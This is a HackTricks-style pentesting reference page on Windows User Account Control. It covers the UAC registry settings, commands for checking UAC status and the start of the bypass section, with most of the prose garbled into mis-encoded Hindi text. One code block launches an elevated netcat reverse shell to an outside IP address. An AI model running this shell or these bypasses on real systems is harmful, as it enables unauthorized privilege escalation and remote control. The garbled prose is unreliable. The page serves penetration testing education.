hacktricks/windows-hardening/windows-security-controls/uac-user-account-control.md

233 lines
30 KiB
Markdown
Raw Normal View History

# UAC - User Account Control
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** ЁЯТм [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}
2022-04-28 16:01:33 +00:00
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-10-03 23:01:22 +00:00
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
2022-10-03 23:01:22 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-08-13 15:36:34 +00:00
## UAC
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) рдПрдХ рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реИ рдЬреЛ **рдЙрдЪреНрдЪ рдЧрддрд┐рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рд╕рд╣рдорддрд┐ рд╕рдВрдХреЗрдд** рд╕рдХреНрд╖рдо рдХрд░рддреА рд╣реИред рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреЗ рд╡рд┐рднрд┐рдиреНрди `integrity` рд╕реНрддрд░ рд╣реЛрддреЗ рд╣реИрдВ, рдФрд░ рдПрдХ **рдЙрдЪреНрдЪ рд╕реНрддрд░** рд╡рд╛рд▓рд╛ рдХрд╛рд░реНрдпрдХреНрд░рдо рдЙрди рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрддрд╛ рд╣реИ рдЬреЛ **рд╕рдВрднрд╡рддрдГ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдЦрддрд░реЗ рдореЗрдВ рдбрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ**ред рдЬрдм UAC рд╕рдХреНрд╖рдо рд╣реЛрддрд╛ рд╣реИ, рдЕрдиреБрдкреНрд░рдпреЛрдЧ рдФрд░ рдХрд╛рд░реНрдп рд╣рдореЗрд╢рд╛ **рдЧреИрд░-рдкреНрд░рд╢рд╛рд╕рдХ рдЦрд╛рддреЗ рдХреЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓рддреЗ рд╣реИрдВ** рдЬрдм рддрдХ рдХрд┐ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдЗрди рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ/рдХрд╛рд░реНрдп рдХреЛ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдкреНрд░рд╢рд╛рд╕рдХ рд╕реНрддрд░ рдХреА рдкрд╣реБрдВрдЪ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдзрд┐рдХреГрдд рди рдХрд░реЗред рдпрд╣ рдПрдХ рд╕реБрд╡рд┐рдзрд╛ рд╣реИ рдЬреЛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЛ рдЕрдирдкреЗрдХреНрд╖рд┐рдд рдкрд░рд┐рд╡рд░реНрддрдиреЛрдВ рд╕реЗ рдмрдЪрд╛рддреА рд╣реИ рд▓реЗрдХрд┐рди рдЗрд╕реЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕реАрдорд╛ рдирд╣реАрдВ рдорд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред
рдЕрдзрд┐рдХрд╛рд░рд┐рддрд╛ рд╕реНрддрд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП:
2022-10-04 23:18:19 +00:00
{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %}
[integrity-levels.md](../windows-local-privilege-escalation/integrity-levels.md)
{% endcontent-ref %}
рдЬрдм UAC рд▓рд╛рдЧреВ рд╣реЛрддрд╛ рд╣реИ, рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ 2 рдЯреЛрдХрди рджрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ: рдПрдХ рдорд╛рдирдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреБрдВрдЬреА, рдирд┐рдпрдорд┐рдд рд╕реНрддрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдирд┐рдпрдорд┐рдд рдХреНрд░рд┐рдпрд╛рдПрдБ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдФрд░ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рдеред
2022-10-03 22:58:50 +00:00
рдпрд╣ [рдкреГрд╖реНрда](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) UAC рдХреЗ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рдкрд░ рдЧрд╣рд░рд╛рдИ рд╕реЗ рдЪрд░реНрдЪрд╛ рдХрд░рддрд╛ рд╣реИ рдФрд░ рд▓реЙрдЧрд┐рди рдкреНрд░рдХреНрд░рд┐рдпрд╛, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрднрд╡, рдФрд░ UAC рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЛ рд╢рд╛рдорд┐рд▓ рдХрд░рддрд╛ рд╣реИред рдкреНрд░рд╢рд╛рд╕рдХ рд╕реБрд░рдХреНрд╖рд╛ рдиреАрддрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдпрд╣ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ UAC рдЙрдирдХреЗ рд╕рдВрдЧрдарди рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдиреАрдп рд╕реНрддрд░ рдкрд░ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ (secpol.msc рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ), рдпрд╛ рдЗрд╕реЗ Active Directory рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рд╕рдореВрд╣ рдиреАрддрд┐ рд╡рд╕реНрддреБрдУрдВ (GPO) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдФрд░ рдзрдХреЗрд▓ рд╕рдХрддреЗ рд╣реИрдВред рд╡рд┐рднрд┐рдиреНрди рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рдЪрд░реНрдЪрд╛ рдХреА рдЧрдИ рд╣реИ [рдпрд╣рд╛рдБ](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)ред UAC рдХреЗ рд▓рд┐рдП 10 рд╕рдореВрд╣ рдиреАрддрд┐ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╕реЗрдЯ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИрдВред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рддрд╛рд▓рд┐рдХрд╛ рдЕрддрд┐рд░рд┐рдХреНрдд рд╡рд┐рд╡рд░рдг рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИ:
2022-10-03 22:58:50 +00:00
| Group Policy Setting | Registry Key | Default Setting |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Enabled |
### UAC Bypass Theory
рдХреБрдЫ рдХрд╛рд░реНрдпрдХреНрд░рдо **рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ** **рдЙрдЪреНрдЪ** рд╕реНрддрд░ рдкрд░ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдореВрд╣** рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реЛрдиреЗ рдкрд░ **рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ** **рдЙрдЪреНрдЪреАрдХреГрдд** рд╣реЛрддреЗ рд╣реИрдВред рдЗрди рдмрд╛рдЗрдирд░реА рдореЗрдВ рдЙрдирдХреЗ _**Manifests**_ рдХреЗ рдЕрдВрджрд░ _**autoElevate**_ рд╡рд┐рдХрд▓реНрдк рдХрд╛ рдорд╛рди _**True**_ рд╣реЛрддрд╛ рд╣реИред рдмрд╛рдЗрдирд░реА рдХреЛ **Microsoft рджреНрд╡рд╛рд░рд╛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд** рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред
рдлрд┐рд░, **UAC** рдХреЛ **рдмрд╛рдпрдкрд╛рд╕** рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рдЙрдЪреНрдЪ **integrity** рд╕реНрддрд░ рд╕реЗ **рдЙрдЪреНрдЪ** рдкрд░) рдХреБрдЫ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреА рдмрд╛рдЗрдирд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╡реЗ **рдордирдорд╛рдиреЗ рдХреЛрдб** рдХреЛ **рдирд┐рд╖реНрдкрд╛рджрд┐рдд** рдХрд░ рд╕рдХреЗрдВ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕реЗ **рдЙрдЪреНрдЪ рд╕реНрддрд░ рдХреА рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛** рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред
рдЖрдк _**sigcheck.exe**_ рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдмрд╛рдЗрдирд░реА рдХрд╛ _**Manifest**_ **рдЪреЗрдХ** рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдФрд░ рдЖрдк _Process Explorer_ рдпрд╛ _Process Monitor_ (Sysinternals рдХреЗ) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ **integrity рд╕реНрддрд░** рдХреЛ **рджреЗрдЦ** рд╕рдХрддреЗ рд╣реИрдВред
### Check UAC
UAC рд╕рдХреНрд╖рдо рд╣реИ рдпрд╛ рдирд╣реАрдВ, рдЗрд╕рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░реЗрдВ:
```
2022-10-03 22:58:50 +00:00
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
2023-11-06 08:38:02 +00:00
EnableLUA REG_DWORD 0x1
2022-10-03 22:58:50 +00:00
```
рдпрджрд┐ рдпрд╣ **`1`** рд╣реИ рддреЛ UAC **рд╕рдХреНрд░рд┐рдп** рд╣реИ, рдпрджрд┐ рдпрд╣ **`0`** рд╣реИ рдпрд╛ рдпрд╣ **рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ**, рддреЛ UAC **рдирд┐рд╖реНрдХреНрд░рд┐рдп** рд╣реИред
2022-10-03 22:58:50 +00:00
рдлрд┐рд░, **рдХреМрди рд╕рд╛ рд╕реНрддрд░** рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЗрд╕рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:
```
2022-10-03 22:58:50 +00:00
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
2022-10-03 22:58:50 +00:00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
2023-11-06 08:38:02 +00:00
ConsentPromptBehaviorAdmin REG_DWORD 0x5
2022-10-03 22:58:50 +00:00
```
* рдпрджрд┐ **`0`** рд╣реИ рддреЛ, UAC рд╕рдВрдХреЗрдд рдирд╣реАрдВ рджреЗрдЧрд╛ (рдЬреИрд╕реЗ **рдЕрдХреНрд╖рдо**)
* рдпрджрд┐ **`1`** рд╣реИ рддреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб** рдкреВрдЫрд╛ рдЬрд╛рдПрдЧрд╛ рдЙрдЪреНрдЪ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдмрд╛рдЗрдирд░реА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░)
* рдпрджрд┐ **`2`** рд╣реИ (**рд╣рдореЗрд╢рд╛ рдореБрдЭреЗ рд╕реВрдЪрд┐рдд рдХрд░реЗрдВ**) UAC рд╣рдореЗрд╢рд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдорд╛рдВрдЧреЗрдЧрд╛ рдЬрдм рд╡рд╣ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдХреБрдЫ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдЧрд╛ (рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░)
* рдпрджрд┐ **`3`** рд╣реИ рддреЛ `1` рдХреА рддрд░рд╣ рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ
* рдпрджрд┐ **`4`** рд╣реИ рддреЛ `2` рдХреА рддрд░рд╣ рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ
* рдпрджрд┐ **`5`** рд╣реИ (**рдбрд┐рдлрд╝реЙрд▓реНрдЯ**) рддреЛ рдпрд╣ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдорд╛рдВрдЧреЗрдЧрд╛ рдХрд┐ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЧреИрд░-рд╡рд┐рдВрдбреЛрдЬ рдмрд╛рдЗрдирд░реА рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
рдлрд┐рд░, рдЖрдкрдХреЛ **`LocalAccountTokenFilterPolicy`** рдХреЗ рдорд╛рди рдкрд░ рдзреНрдпрд╛рди рджреЗрдирд╛ рд╣реЛрдЧрд╛\
рдпрджрд┐ рдорд╛рди **`0`** рд╣реИ, рддреЛ рдХреЗрд╡рд▓ **RID 500** рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (**рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ**) **UAC рдХреЗ рдмрд┐рдирд╛ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп** рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдФрд░ рдпрджрд┐ рдЗрд╕рдХрд╛ `1` рд╣реИ, рддреЛ **"Administrators"** рд╕рдореВрд╣ рдХреЗ рд╕рднреА рдЦрд╛рддреЗ рдРрд╕рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдФрд░, рдЕрдВрдд рдореЗрдВ **`FilterAdministratorToken`** рдХреБрдВрдЬреА рдХреЗ рдорд╛рди рдкрд░ рдзреНрдпрд╛рди рджреЗрдВ\
рдпрджрд┐ **`0`** (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рд╣реИ, рддреЛ **рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддрд╛** рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдпрджрд┐ **`1`** рд╣реИ рддреЛ рдмрд┐рд▓реНрдЯ-рдЗрди рдЦрд╛рддрд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ **рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп** рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛, рдЬрдм рддрдХ `LocalAccountTokenFilterPolicy` рдХреЛ `1` рдкрд░ рд╕реЗрдЯ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред
2023-11-06 08:38:02 +00:00
#### рд╕рд╛рд░рд╛рдВрд╢
* рдпрджрд┐ `EnableLUA=0` рдпрд╛ **рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ**, **рдХрд┐рд╕реА рдХреЗ рд▓рд┐рдП рднреА UAC рдирд╣реАрдВ**
* рдпрджрд┐ `EnableLua=1` рдФрд░ **`LocalAccountTokenFilterPolicy=1`**, рдХрд┐рд╕реА рдХреЗ рд▓рд┐рдП рднреА UAC рдирд╣реАрдВ
* рдпрджрд┐ `EnableLua=1` рдФрд░ **`LocalAccountTokenFilterPolicy=0` рдФрд░ `FilterAdministratorToken=0`, RID 500 (рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ) рдХреЗ рд▓рд┐рдП рдХреЛрдИ UAC рдирд╣реАрдВ**
* рдпрджрд┐ `EnableLua=1` рдФрд░ **`LocalAccountTokenFilterPolicy=0` рдФрд░ `FilterAdministratorToken=1`, рд╕рднреА рдХреЗ рд▓рд┐рдП UAC**
рдпрд╣ рд╕рднреА рдЬрд╛рдирдХрд╛рд░реА **metasploit** рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХрддреНрд░ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИ: `post/windows/gather/win_privs`
рдЖрдк рдЕрдкрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╕рдореВрд╣реЛрдВ рдХреА рднреА рдЬрд╛рдВрдЪ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
```
net user %username%
whoami /groups | findstr Level
```
## UAC рдмрд╛рдпрдкрд╛рд╕
2022-10-03 22:58:50 +00:00
{% hint style="info" %}
рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдкреАрдбрд╝рд┐рдд рддрдХ рдЧреНрд░рд╛рдлрд┐рдХрд▓ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ UAC рдмрд╛рдпрдкрд╛рд╕ рд╕реАрдзрд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЖрдк рдмрд╕ "рд╣рд╛рдБ" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрдм UAS рдкреНрд░реЙрдореНрдкреНрдЯ рдкреНрд░рдХрдЯ рд╣реЛрддрд╛ рд╣реИ
2020-08-31 16:15:38 +00:00
{% endhint %}
UAC рдмрд╛рдпрдкрд╛рд╕ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕реНрдерд┐рддрд┐ рдореЗрдВ рд╣реЛрддреА рд╣реИ: **UAC рд╕рдХреНрд░рд┐рдп рд╣реИ, рдЖрдкрдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдПрдХ рдордзреНрдпрдо рдЕрдЦрдВрдбрддрд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓ рд░рд╣реА рд╣реИ, рдФрд░ рдЖрдкрдХрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рд╕рдореВрд╣ рдореЗрдВ рд╣реИ**ред
рдпрд╣ рдЙрд▓реНрд▓реЗрдЦ рдХрд░рдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХрд┐ **UAC рдХреЛ рдЙрдЪреНрдЪрддрдо рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░ (рд╣рдореЗрд╢рд╛) рдореЗрдВ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдирд╛ рдмрд╣реБрдд рдХрдард┐рди рд╣реИ, рдмрдЬрд╛рдп рдЗрд╕рдХреЗ рдХрд┐ рдпрд╣ рдХрд┐рд╕реА рдЕрдиреНрдп рд╕реНрддрд░ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рдореЗрдВ рд╣реЛред**
2020-10-22 16:45:33 +00:00
### UAC рдЕрдХреНрд╖рдо
2020-10-22 16:45:33 +00:00
рдпрджрд┐ UAC рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЕрдХреНрд╖рдо рд╣реИ (`ConsentPromptBehaviorAdmin` **`0`** рд╣реИ) рддреЛ рдЖрдк **рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ** (рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░) рдХреБрдЫ рдЗрд╕ рддрд░рд╣:
2020-10-22 16:45:33 +00:00
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
2020-12-27 17:31:50 +00:00
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
2020-10-22 16:45:33 +00:00
```
#### UAC рдмрд╛рдпрдкрд╛рд╕ рдЯреЛрдХрди рдбреБрдкреНрд▓реАрдХреЗрд╢рди рдХреЗ рд╕рд╛рде
2022-08-13 15:36:34 +00:00
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
### **рдмрд╣реБрдд** рдмреБрдирд┐рдпрд╛рджреА UAC "рдмрд╛рдпрдкрд╛рд╕" (рдкреВрд░реНрдг рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдкрд╣реБрдБрдЪ)
2022-10-03 22:58:50 +00:00
рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рд╢реЗрд▓ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИ рдЬреЛ Administrators рд╕рдореВрд╣ рдХреЗ рдЕрдВрджрд░ рд╣реИ, рддреЛ рдЖрдк **C$** рд╕рд╛рдЭрд╛ рдХреЛ SMB (рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдирдП рдбрд┐рд╕реНрдХ рдореЗрдВ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ **рдорд╛рдЙрдВрдЯ** рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЖрдкрдХреЛ **рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдХреЗ рдЕрдВрджрд░ рд╕рдм рдХреБрдЫ рддрдХ рдкрд╣реБрдБрдЪ** рдкреНрд░рд╛рдкреНрдд рд╣реЛрдЧреА (рдпрд╣рд╛рдБ рддрдХ рдХрд┐ Administrator рдХрд╛ 